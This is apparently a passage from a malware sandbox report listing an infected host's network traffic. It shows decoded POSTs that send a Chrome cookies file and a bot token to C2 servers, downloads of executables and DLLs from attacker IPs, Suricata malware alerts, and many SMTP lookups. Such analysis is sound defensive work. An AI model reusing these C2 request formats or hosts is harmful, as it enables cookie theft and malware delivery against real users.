0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 2d 2d 0d 0a Data Ascii: ------HDHCGHDHIDHCBGCBGCAEContent-Disposition: form-data; name="token"ca98b7fd94f8e61733555130339e0a26a0f7f29af570b5df02840f121c9f97a4938330b7------HDHCGHDHIDHCBGCBGCAEContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------HDHCGHDHIDHCBGCBGCAEContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------HDHCGHDHIDHCBGCBGCAE--
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHDHJKKJDHJJJJKEGHIHost: dugong.ydns.euContent-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 61 39 38 62 37 66 64 39 34 66 38 65 36 31 37 33 33 35 35 35 31 33 30 33 33 39 65 30 61 32 36 61 30 66 37 66 32 39 61 66 35 37 30 62 35 64 66 30 32 38 34 30 66 31 32 31 63 39 66 39 37 61 34 39 33 38 33 33 30 62 37 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 2d 2d 0d 0a Data Ascii: ------BFHDHJKKJDHJJJJKEGHIContent-Disposition: form-data; name="token"ca98b7fd94f8e61733555130339e0a26a0f7f29af570b5df02840f121c9f97a4938330b7------BFHDHJKKJDHJJJJKEGHIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFHDHJKKJDHJJJJKEGHIContent-Disposition: form-data; name="file"------BFHDHJKKJDHJJJJKEGHI--
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                                                Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 31 31 32 32 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10111220101&unit=246122658369
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                                Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 31 31 32 32 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10111220101&unit=246122658369
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFBKKEBKEBGIDHIEHCFHost: dugong.ydns.euContent-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 42 4b 4b 45 42 4b 45 42 47 49 44 48 49 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 61 39 38 62 37 66 64 39 34 66 38 65 36 31 37 33 33 35 35 35 31 33 30 33 33 39 65 30 61 32 36 61 30 66 37 66 32 39 61 66 35 37 30 62 35 64 66 30 32 38 34 30 66 31 32 31 63 39 66 39 37 61 34 39 33 38 33 33 30 62 37 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 4b 4b 45 42 4b 45 42 47 49 44 48 49 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 4b 4b 45 42 4b 45 42 47 49 44 48 49 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 4b 4b 45 42 4b 45 42 47 49 44 48 49 45 48 43 46 2d 2d 0d 0a Data Ascii: ------HCFBKKEBKEBGIDHIEHCFContent-Disposition: form-data; name="token"ca98b7fd94f8e61733555130339e0a26a0f7f29af570b5df02840f121c9f97a4938330b7------HCFBKKEBKEBGIDHIEHCFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HCFBKKEBKEBGIDHIEHCFContent-Disposition: form-data; name="file"------HCFBKKEBKEBGIDHIEHCF--
                                                Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/freebl3.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/mozglue.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: GET //kj2h34kj23h4/msvcp140.dll HTTP/1.1Host: dugong.ydns.euCache-Control: no-cache
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49755 -> 176.113.115.7:80
                                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49757 -> 176.113.115.7:80
                                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49761 -> 45.59.120.8:80
                                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49763 -> 176.113.115.7:80
                                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49776 -> 176.113.115.7:80
                                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49793 -> 176.113.115.7:80
                                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49801 -> 176.113.115.7:80
                                                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.11:49762 -> 38.180.229.217:80
                                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:59889 -> 176.113.115.7:80
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:59943 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:64553 -> 176.113.115.7:80
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:64532 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:64586 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.11:64638 -> 38.180.229.217:80
                                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:64734 -> 176.113.115.7:80
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:64662 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:64756 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:64821 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:64823 -> 23.197.127.21:443
                                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:53723 -> 176.113.115.7:80
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53736 -> 104.21.24.225:443
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53747 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53889 -> 104.21.24.225:443
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53928 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53950 -> 104.21.24.225:443
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:53957 -> 104.21.80.1:443
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:50532 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:50549 -> 104.21.24.225:443
                                                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.11:50576 -> 38.180.229.217:80
                                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50589 -> 176.113.115.7:80
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:50574 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:50611 -> 104.21.24.225:443
                                                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.11:50637 -> 38.180.229.217:80
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:50636 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.11:50656 -> 38.180.229.217:80
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:50654 -> 104.21.24.225:443
                                                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.11:50694 -> 38.180.229.217:80
                                                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.11:50715 -> 38.180.229.217:80
                                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50709 -> 176.113.115.7:80
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:50703 -> 104.21.24.225:443
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:50783 -> 104.21.24.225:443
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:50776 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:50804 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:50732 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:50839 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:50676 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50845 -> 176.113.115.7:80
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:50902 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:50951 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:51004 -> 176.113.115.7:80
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:50998 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.11:50918 -> 45.93.20.28:80
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:51039 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:51103 -> 185.176.43.98:80
                                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:51067 -> 176.113.115.7:80
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:51118 -> 104.21.48.1:443
                                                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:51082 -> 104.21.48.1:443
                                                Source: unknownDNS traffic detected: query: gvnkva.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.phuannhan.vn replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.brickgroup.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.uhcqc8.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.jsjnsnsjs.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: homtali.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.gfgdhdh.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.monitors.co.il replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.moko.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.universalcomputersys.nl replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.satfacility.it replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: orbnge.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.alpinecleaning.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.bostonmarketing.org replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.east-ride.de replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.myffca.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.instant-t-events.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.naturale.bio.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.motogo.vn replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: lyndsiloucks.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.utravelmelbourne.com.au replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: sutienda.ar replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.net-auction.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.kenethj.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.roberthaybach.de replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.grupoengenhar.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.aleixo.com replaycode: Server failure (2)
                                                Source: unknownDNS traffic detected: query: securesmtp.seotecnology.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.outloock.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.krovatka.su replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.gtp.co.nz replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.xristo.gr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.surfersmap.es replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.seta.com.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.abaetenet.psi.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.hipsi.net replaycode: Server failure (2)
                                                Source: unknownDNS traffic detected: query: mlnur.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.bauer-systeme.de replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.bookingholdings.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: qldx.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.rclup.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.eu.panasonic.cz replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.woollenmills.ie replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: vcyuzhre.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.bloomhs.org replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.itpro.nl replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.hldisplay.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: hojmail.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.aliyun.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.millysantana.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.rghb replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.gxcfts.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.ecaok.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: cancunriveiramaya.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.chiongbian.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.altursa-montadores.es replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.svitonline.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.cem.dur.ac.uk replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.lojaestetica.com.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.gvyc3h.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.sawracki.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.3a5r.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.shoat.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.ayoubtamous.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.dewcoaching4u.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.svtwo.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.chunky.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.knecht-vision.ch replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.freebits.at replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.goldmediaart.hu replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: starrynsightsky.icu replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.data-dyn.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.globalsafewear.co.nz replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.bnipuertovallarta.info replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.bccs.uib.no replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.insaver.se replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.wemo-barbing.de replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.beyhysakjwmv.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.richnlucy.fsnet.co.uk replaycode: Server failure (2)
                                                Source: unknownDNS traffic detected: query: smtp.ibb.gov.tr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.generalfierro.com.mx replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: jingdong919.cn replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.kirkwoodmo.org replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.poocanoe.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.congres-immobilier.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.myhousedecor.com.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: diopiacp.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.sysnovations.com replaycode: Name error (3)
